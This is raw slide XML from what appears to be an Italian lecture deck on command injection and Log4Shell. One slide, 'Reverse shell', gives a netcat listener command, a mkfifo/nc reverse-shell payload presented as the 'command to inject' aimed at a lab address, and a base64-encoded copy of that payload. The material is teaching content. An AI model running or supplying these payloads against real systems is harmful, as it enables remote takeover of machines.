                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Prima della richiesta</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4990F8A2-1328-2160-E17C-0E4BD906B503}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632939" y="3087530"/>
            <a:ext cx="3878120" cy="1176722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="CasellaDiTesto 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2446CF28-07F3-E08A-6A04-1FDC7BAAFD78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3670409" y="2702855"/>
            <a:ext cx="1803178" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Dopo la richiesta</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Google Shape;213;p36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B364E4CA-D24E-BF57-D6FA-7AADC0C2D6F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1435970" y="245203"/>
            <a:ext cx="7169150" cy="546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800"/>
              <a:buFont typeface="Montserrat ExtraBold"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accen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2pPr>
            <a:lvl3pPr marR="0" lvl="2"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3pPr>
            <a:lvl4pPr marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marR="0" lvl="8"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9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="3400"/>
              <a:t>Esempio 1: Creazione di un file</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="3400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1622529479"/>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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1665110" y="181050"/>
            <a:ext cx="6039555" cy="7556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400" dirty="0" err="1"/>
              <a:t>Esempio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400" dirty="0"/>
              <a:t> 2: Reverse shell</a:t>
            </a:r>
            <a:endParaRPr sz="3400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;215;p36"/>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36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="629692" y="1105264"/>
            <a:ext cx="144992" cy="269768"/>
            <a:chOff x="629692" y="1105264"/>
            <a:chExt cx="144992" cy="269768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Google Shape;217;p36"/>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6"/>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36">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220" name="Google Shape;220;p36"/>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it-IT" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>15</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p36">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22" name="Google Shape;222;p36">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 name="CasellaDiTesto 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2288FFAA-4FD8-A70A-8D9E-3CEFBCD70407}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1467555" y="1240470"/>
            <a:ext cx="6039556" cy="1600438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Shell code utilizzato da un attaccante per ottenere il controllo della macchina target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>L’ attaccante apre una porta e si mette in ascolto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Inviando un determinato payload si fa in modo che la macchina vittima si colleghi alla porta aperta</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F98198DA-B621-D7E7-8790-7CB31462DFCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1060626" y="3206625"/>
            <a:ext cx="7248525" cy="1628775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="983308609"/>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5" name="Google Shape;215;p36"/>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36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="629692" y="1105264"/>
            <a:ext cx="144992" cy="269768"/>
            <a:chOff x="629692" y="1105264"/>
            <a:chExt cx="144992" cy="269768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Google Shape;217;p36"/>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6"/>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36">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220" name="Google Shape;220;p36"/>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it-IT" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>15</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p36">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22" name="Google Shape;222;p36">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1" name="CasellaDiTesto 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9F7C1FE-3865-3E99-D2B9-9F54CB789584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1326070" y="1811794"/>
            <a:ext cx="7050286" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>nvlp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t> 9001</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="CasellaDiTesto 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94452827-AFFA-5C46-0788-502AA96E975A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1326070" y="1414189"/>
            <a:ext cx="6760407" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Per prima cosa l’attaccante si mette in ascolto su una determinata porta:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="CasellaDiTesto 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E7100E0-B9C5-8E5B-DFE6-2C22C413CDE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1288675" y="2514257"/>
            <a:ext cx="6429397" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Comando da iniettare:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="CasellaDiTesto 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98C718B1-40EF-14CD-EE31-2DAAE23B6B95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1288675" y="2955110"/>
            <a:ext cx="7087681" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f;mkfifo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f;cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f|sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -i 2&gt;&amp;1|nc 10.0.2.15 9001 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="000000"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="CasellaDiTesto 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC376746-3F04-40A9-C031-A9C8F3E267D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1288674" y="4140605"/>
            <a:ext cx="7087681" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDEwLjAuMi4xNSA5MDAxID4vdG1wL2Y=</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="CasellaDiTesto 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D622FDB3-0F38-F974-C50C-3FFB89AFAB43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1288674" y="3755985"/>
            <a:ext cx="6429397" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Corrispettivo in base 64:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Google Shape;213;p36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8679FF1F-13BD-87E1-CF3F-F1731C4D16EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1665110" y="181050"/>
            <a:ext cx="6039555" cy="75565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800"/>
              <a:buFont typeface="Montserrat ExtraBold"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accen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2pPr>
            <a:lvl3pPr marR="0" lvl="2"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3pPr>
            <a:lvl4pPr marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marR="0" lvl="8"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9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="3400"/>
              <a:t>Esempio 2: Reverse shell</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="3400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3282940233"/>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5" name="Google Shape;215;p36"/>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36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="629692" y="1105264"/>
            <a:ext cx="144992" cy="269768"/>
            <a:chOff x="629692" y="1105264"/>
            <a:chExt cx="144992" cy="269768"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Google Shape;217;p36"/>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6"/>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36">
            <a:hlinkClick r:id="rId5"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220" name="Google Shape;220;p36"/>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it-IT" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p36">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22" name="Google Shape;222;p36">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pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Reverse shell">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D648927-8290-19E1-15A7-668D0703B93B}"/>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582310" y="685924"/>
            <a:ext cx="5764695" cy="3520315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3355201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120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showWhenStopped="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13" name="Google Shape;214;p36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E98E9C1-0855-28B9-3A50-E9666BB89883}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1353950" y="971352"/>
            <a:ext cx="7154862" cy="3406775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Tutte le versione di Log4j precedenti alla 2.15.0 erano affette dalla vulnerabilità Log4Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="l"/>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-285750" algn="l">
